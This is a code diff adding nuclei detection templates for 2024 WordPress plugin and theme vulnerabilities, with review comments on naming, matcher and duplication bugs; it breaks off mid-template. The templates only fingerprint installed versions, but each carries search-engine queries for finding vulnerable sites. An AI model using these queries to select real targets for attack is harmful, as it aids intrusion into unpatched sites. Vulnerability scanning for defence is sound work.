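Review bot: The file is `CVE-2024-11254.yaml` but its first line is `id: CVE-2024-11254-0a41e95f2c7eae4094eccfb9191bc605`, the id of the already-indexed `CVE-2024-11254-0a41e95f2c7eae4094eccfb9191bc605.yaml`, so the commit adds a second template with the same id; `id: CVE-2024-11254` would match the file stem and stay unique. The same stem/id mismatch is present in the other unsuffixed files added here — `CVE-2024-11291.yaml`, `CVE-2024-11295.yaml`, `CVE-2024-11439.yaml`, `CVE-2024-11748.yaml`, `CVE-2024-11881.yaml`, `CVE-2024-11912.yaml`, `CVE-2024-11926.yaml` and `CVE-2024-12025.yaml` — each carrying a hash-suffixed id; whether those also collide depends on whether suffixed siblings exist outside this diff.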
@@ -0,0 +1,59 @@
+id: CVE-2024-11291-4b3df78ea45d69129dc5fbd828bf0deb
+
+info:
+ name: >
+ Paid Membership Subscriptions – Effortless Memberships, Recurring Payments & Content Restriction <= 2.13.4 - Unauthenticated Content Restriction Bypass to Sensitive Information Exposure
+ author: topscoder
+ severity: medium
+ description: >
+ The Paid Membership Subscriptions – Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.13.4 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as logged-in users.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e207f1a3-2ca5-46d1-91a9-89652451266c?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-11291
+ metadata:
+ fofa-query: "wp-content/plugins/paid-member-subscriptions/"
+ google-query: inurl:"/wp-content/plugins/paid-member-subscriptions/"
+ shodan-query: 'vuln:CVE-2024-11291'
+ tags: cve,wordpress,wp-plugin,paid-member-subscriptions,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/paid-member-subscriptions/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "paid-member-subscriptions"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.13.4')
\ No newline at end of file
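Review bot: The `name` and `description` describe a content-restriction bypass through WordPress search, but the only request fetches `readme.txt` and the `dsl` matcher compares the `Stable tag` with `<= 2.13.4`, so a hit says an affected version is installed, not that restricted content was actually reachable. That is a reasonable version fingerprint, but the name invites triagers to treat a match as a confirmed exposure; a line under `info` such as `# Detection by installed version only - the search bypass itself is not exercised` would set expectations. Every topscoder template in this commit has the same readme/`Stable tag` (or `style.css`/`Version`) shape, so the caveat applies to all of them.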
diff --git a/poc/cve/CVE-2024-11295.yaml b/poc/cve/CVE-2024-11295.yaml
new file mode 100644
index 0000000000..e6bd412bb2
--- /dev/null
+++ b/poc/cve/CVE-2024-11295.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11295-a4e709d48a2b52b5c9f616e57c38968a
+
+info:
+ name: >
+ Simple Page Access Restriction <= 1.0.29 - Unauthenticated Content Restriction Bypass to Sensitive Information Exposure
+ author: topscoder
+ severity: medium
+ description: >
+ The Simple Page Access Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.29 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as logged-in users.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ed92806e-5d75-4a23-a588-821e9ada1b32?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-11295
+ metadata:
+ fofa-query: "wp-content/plugins/simple-page-access-restriction/"
+ google-query: inurl:"/wp-content/plugins/simple-page-access-restriction/"
+ shodan-query: 'vuln:CVE-2024-11295'
+ tags: cve,wordpress,wp-plugin,simple-page-access-restriction,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simple-page-access-restriction/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "simple-page-access-restriction"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.29')
\ No newline at end of file
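Review bot: The two `extractors` entries are the same regex, both named `version`, and differ only in `internal: true` on the first; if a `dsl` matcher can read a named non-internal extractor (I believe it can, but confirm against the nuclei version in use) the internal copy is redundant and the block could be halved. With both exporting the same name a reader has to work out which value `compare_versions(version, ...)` sees; if both are kept, a comment on the first entry, `# internal copy feeds compare_versions; the second surfaces the version in output`, would state the intent. The same duplicated pair is in every topscoder template of this commit.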
diff --git a/poc/cve/CVE-2024-11356-ef26df4d3b60de17a0b2970f889bcedd.yaml b/poc/cve/CVE-2024-11356-ef26df4d3b60de17a0b2970f889bcedd.yaml
new file mode 100644
index 0000000000..625c950eff
--- /dev/null
+++ b/poc/cve/CVE-2024-11356-ef26df4d3b60de17a0b2970f889bcedd.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11356-ef26df4d3b60de17a0b2970f889bcedd
+
+info:
+ name: >
+ Tour Master - Tour Booking, Travel, Hotel < 5.3.4 - Unauthenticated Stored Cross-Site Scripting via Room Booking
+ author: topscoder
+ severity: high
+ description: >
+ The Tour Master - Tour Booking, Travel, Hotel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via room booking in all versions up to 5.3.4 (exclusive) due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/12b1b1b4-a62f-451e-a78d-c1d85202a4cf?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 7.2
+ cve-id: CVE-2024-11356
+ metadata:
+ fofa-query: "wp-content/plugins/tourmaster/"
+ google-query: inurl:"/wp-content/plugins/tourmaster/"
+ shodan-query: 'vuln:CVE-2024-11356'
+ tags: cve,wordpress,wp-plugin,tourmaster,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/tourmaster/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "tourmaster"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '< 5.3.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11439.yaml b/poc/cve/CVE-2024-11439.yaml
new file mode 100644
index 0000000000..a0dad5212a
--- /dev/null
+++ b/poc/cve/CVE-2024-11439.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11439-475f578349d17c65330df618e26d04b2
+
+info:
+ name: >
+ ScanCircle <= 2.9.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The ScanCircle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'scancircle' shortcode in all versions up to, and including, 2.9.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/27cc6931-086c-43a5-965b-2a19f15bb356?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11439
+ metadata:
+ fofa-query: "wp-content/plugins/scancircle/"
+ google-query: inurl:"/wp-content/plugins/scancircle/"
+ shodan-query: 'vuln:CVE-2024-11439'
+ tags: cve,wordpress,wp-plugin,scancircle,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/scancircle/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "scancircle"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.9.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11740-0129d5469319a449ba4a4cece10b2475.yaml b/poc/cve/CVE-2024-11740-0129d5469319a449ba4a4cece10b2475.yaml
new file mode 100644
index 0000000000..7a7a095578
--- /dev/null
+++ b/poc/cve/CVE-2024-11740-0129d5469319a449ba4a4cece10b2475.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11740-0129d5469319a449ba4a4cece10b2475
+
+info:
+ name: >
+ Download Manager <= 3.3.03 - Unauthenticated Arbitrary Shortcode Execution
+ author: topscoder
+ severity: high
+ description: >
+ The The Download Manager plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.3.03. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4a7be578-5883-4cd3-963d-bf81c3af2003?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
+ cvss-score: 7.3
+ cve-id: CVE-2024-11740
+ metadata:
+ fofa-query: "wp-content/plugins/download-manager/"
+ google-query: inurl:"/wp-content/plugins/download-manager/"
+ shodan-query: 'vuln:CVE-2024-11740'
+ tags: cve,wordpress,wp-plugin,download-manager,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/download-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "download-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3.03')
\ No newline at end of file
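Review bot: The description opens with a doubled article, `The The Download Manager plugin`, which should read `The Download Manager plugin`. This template and `CVE-2024-11768-0f86f52c54d00831befe297b09b8631b.yaml` in the same commit fetch the same `readme.txt`, match the same word `download-manager` and apply the same `<= 3.3.03` bound, so they will always fire together on an affected install; that is expected for two advisories against one release, but a comment noting it (`# pairs with CVE-2024-11768 - same version range, same fingerprint`) stops the two results being read as independent findings.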
diff --git a/poc/cve/CVE-2024-11748.yaml b/poc/cve/CVE-2024-11748.yaml
new file mode 100644
index 0000000000..812a3b9f84
--- /dev/null
+++ b/poc/cve/CVE-2024-11748.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11748-15ab22025f25319cc075ac10ba230d57
+
+info:
+ name: >
+ Taeggie Feed <= 0.1.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Taeggie Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'taeggie-feed' shortcode in all versions up to, and including, 0.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/65d11459-5cad-4d8b-a81d-7f0dd4342a52?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11748
+ metadata:
+ fofa-query: "wp-content/plugins/taeggie-feed/"
+ google-query: inurl:"/wp-content/plugins/taeggie-feed/"
+ shodan-query: 'vuln:CVE-2024-11748'
+ tags: cve,wordpress,wp-plugin,taeggie-feed,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/taeggie-feed/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "taeggie-feed"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 0.1.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11768-0f86f52c54d00831befe297b09b8631b.yaml b/poc/cve/CVE-2024-11768-0f86f52c54d00831befe297b09b8631b.yaml
new file mode 100644
index 0000000000..c84c98aac5
--- /dev/null
+++ b/poc/cve/CVE-2024-11768-0f86f52c54d00831befe297b09b8631b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11768-0f86f52c54d00831befe297b09b8631b
+
+info:
+ name: >
+ Download manager <= 3.3.03 - Improper Authorization to Unauthenticated Download of Password-Protected Files
+ author: topscoder
+ severity: medium
+ description: >
+ The Download Manager plugin for WordPress is vulnerable to unauthorized download of password-protected content due to improper password validation on the checkFilePassword function in all versions up to, and including, 3.3.03. This makes it possible for unauthenticated attackers to download password-protected files.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/feb915f4-66d6-4f46-949c-5354e414319b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-11768
+ metadata:
+ fofa-query: "wp-content/plugins/download-manager/"
+ google-query: inurl:"/wp-content/plugins/download-manager/"
+ shodan-query: 'vuln:CVE-2024-11768'
+ tags: cve,wordpress,wp-plugin,download-manager,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/download-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "download-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3.03')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11881.yaml b/poc/cve/CVE-2024-11881.yaml
new file mode 100644
index 0000000000..6e6dc2fd8c
--- /dev/null
+++ b/poc/cve/CVE-2024-11881.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11881-28951564b40a53810677e572dcba4e96
+
+info:
+ name: >
+ Easy Waveform Player <= 1.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Easy Waveform Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'easywaveformplayer' shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/17a0d8b3-e54d-4af4-8915-e8b192cc138b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11881
+ metadata:
+ fofa-query: "wp-content/plugins/easy-waveform-player/"
+ google-query: inurl:"/wp-content/plugins/easy-waveform-player/"
+ shodan-query: 'vuln:CVE-2024-11881'
+ tags: cve,wordpress,wp-plugin,easy-waveform-player,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/easy-waveform-player/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "easy-waveform-player"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11912.yaml b/poc/cve/CVE-2024-11912.yaml
new file mode 100644
index 0000000000..a4abd4dd49
--- /dev/null
+++ b/poc/cve/CVE-2024-11912.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11912-6ccaac05572b45a2acb0cf1f38c333a9
+
+info:
+ name: >
+ Traveler <= 3.1.6 - Unauthenticated SQL Injection via order_id
+ author: topscoder
+ severity: critical
+ description: >
+ The Travel Booking WordPress Theme theme for WordPress is vulnerable to blind time-based SQL Injection via the ‘order_id’ parameter in all versions up to, and including, 3.1.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/febd1ff3-3a1a-49c2-b210-9e72051e3172?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2024-11912
+ metadata:
+ fofa-query: "wp-content/themes/traveler/"
+ google-query: inurl:"/wp-content/themes/traveler/"
+ shodan-query: 'vuln:CVE-2024-11912'
+ tags: cve,wordpress,wp-theme,traveler,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/traveler/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "traveler"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11926.yaml b/poc/cve/CVE-2024-11926.yaml
new file mode 100644
index 0000000000..c7c096f781
--- /dev/null
+++ b/poc/cve/CVE-2024-11926.yaml
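Review bot: The `word` matcher requires the lowercase `traveler` in the body of `style.css`, and nuclei word matchers are case-sensitive unless `case-insensitive: true` is set; if the stylesheet header only spells it `Theme Name: Traveler` the matcher fails and the template never reports, whatever `Version:` the extractor found. Either match a string known to appear verbatim in that file or add `case-insensitive: true` to the matcher. `CVE-2024-11926.yaml` in this commit uses the same `traveler` matcher against the same file and has the same exposure.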
@@ -0,0 +1,59 @@
+id: CVE-2024-11926-3eda00250e08ecc30fa30e5fb71ad416
+
+info:
+ name: >
+ Traveler <= 3.1.6 - Missing Authorization in Several AJAX Actions
+ author: topscoder
+ severity: low
+ description: >
+ The Travel Booking WordPress Theme theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the '__stPartnerCreateServiceRental', 'st_delete_order_item', '_st_partner_approve_booking', 'save_order_item', and '__userDenyEachInfo' functions in all versions up to, and including, 3.1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify posts, delete posts and pages, approve arbitrary orders, insert orders with arbitrary prices, and deny user information.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d21c7537-8437-43aa-ab52-9e14d27a6e7f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2024-11926
+ metadata:
+ fofa-query: "wp-content/themes/traveler/"
+ google-query: inurl:"/wp-content/themes/traveler/"
+ shodan-query: 'vuln:CVE-2024-11926'
+ tags: cve,wordpress,wp-theme,traveler,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/traveler/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "traveler"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12025.yaml b/poc/cve/CVE-2024-12025.yaml
new file mode 100644
index 0000000000..da6e1954fb
--- /dev/null
+++ b/poc/cve/CVE-2024-12025.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12025-4c9c64b61165ebb81c12eb54c60dfa5f
+
+info:
+ name: >
+ Collapsing Categories <= 3.0.8 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
+ The Collapsing Categories plugin for WordPress is vulnerable to SQL Injection via the 'taxonomy' parameter of the /wp-json/collapsing-categories/v1/get REST API in all versions up to, and including, 3.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/05153b11-2f26-425e-99ab-93216861802b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2024-12025
+ metadata:
+ fofa-query: "wp-content/plugins/collapsing-categories/"
+ google-query: inurl:"/wp-content/plugins/collapsing-categories/"
+ shodan-query: 'vuln:CVE-2024-12025'
+ tags: cve,wordpress,wp-plugin,collapsing-categories,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/collapsing-categories/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "collapsing-categories"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.0.8')
\ No newline at end of file
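Review bot: The word matcher `- "collapsing-categories"` requires the plugin's directory slug to appear literally in readme.txt, which a WordPress readme is not obliged to contain (it carries the display name and the `Stable tag:` header, not necessarily the directory name), so an install whose readme omits the slug is skipped even after the version extractor has succeeded. The 200 response from the plugin-specific readme path already establishes that the plugin directory exists, so the slug check adds little beyond that assumption; either record it with a comment such as `# assumes the slug appears in readme.txt; verify against the published plugin` or match on a string the extractor already depends on, such as `Stable tag:`. Every readme.txt-based hunk in this commit uses the same pattern and would benefit from the same treatment.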
diff --git a/poc/cve/CVE-2024-12061.yaml b/poc/cve/CVE-2024-12061.yaml
new file mode 100644
index 0000000000..a5052bf851
--- /dev/null
+++ b/poc/cve/CVE-2024-12061.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12061-b41bc216e05397f68e1c316d11d953c1
+
+info:
+ name: >
+ Events Addon for Elementor <= 2.2.3 - Authenticated (Contributor+) Post Disclosure
+ author: topscoder
+ severity: low
+ description: >
+ The Events Addon for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2.3 via the naevents_elementor_template shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f59d9d8a-467a-4920-963a-da45f1f4462f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-12061
+ metadata:
+ fofa-query: "wp-content/plugins/events-addon-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/events-addon-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-12061'
+ tags: cve,wordpress,wp-plugin,events-addon-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/events-addon-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "events-addon-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12121-28bd43332ba5567c247178a27dbbf56c.yaml b/poc/cve/CVE-2024-12121-28bd43332ba5567c247178a27dbbf56c.yaml
new file mode 100644
index 0000000000..f43546f837
--- /dev/null
+++ b/poc/cve/CVE-2024-12121-28bd43332ba5567c247178a27dbbf56c.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12121-28bd43332ba5567c247178a27dbbf56c
+
+info:
+ name: >
+ Broken Link Checker | Finder <= 2.5.0 - Authenticated (Author+) Blind Server-Side Request Forgery
+ author: topscoder
+ severity: low
+ description: >
+ The Broken Link Checker | Finder plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 2.5.0 via the 'moblc_check_link' function. This makes it possible for authenticated attackers, with Author-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/fa52034e-3d11-4be5-ab8b-8f7256be2a3e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2024-12121
+ metadata:
+ fofa-query: "wp-content/plugins/broken-link-finder/"
+ google-query: inurl:"/wp-content/plugins/broken-link-finder/"
+ shodan-query: 'vuln:CVE-2024-12121'
+ tags: cve,wordpress,wp-plugin,broken-link-finder,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/broken-link-finder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "broken-link-finder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.5.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12250.yaml b/poc/cve/CVE-2024-12250.yaml
new file mode 100644
index 0000000000..3debbac7c6
--- /dev/null
+++ b/poc/cve/CVE-2024-12250.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12250-1ea7392f59e0ddf4978022124851bf49
+
+info:
+ name: >
+ Accept Authorize.NET Payments Using Contact Form 7 <= 2.2 - Unauthenticated Information Exposure
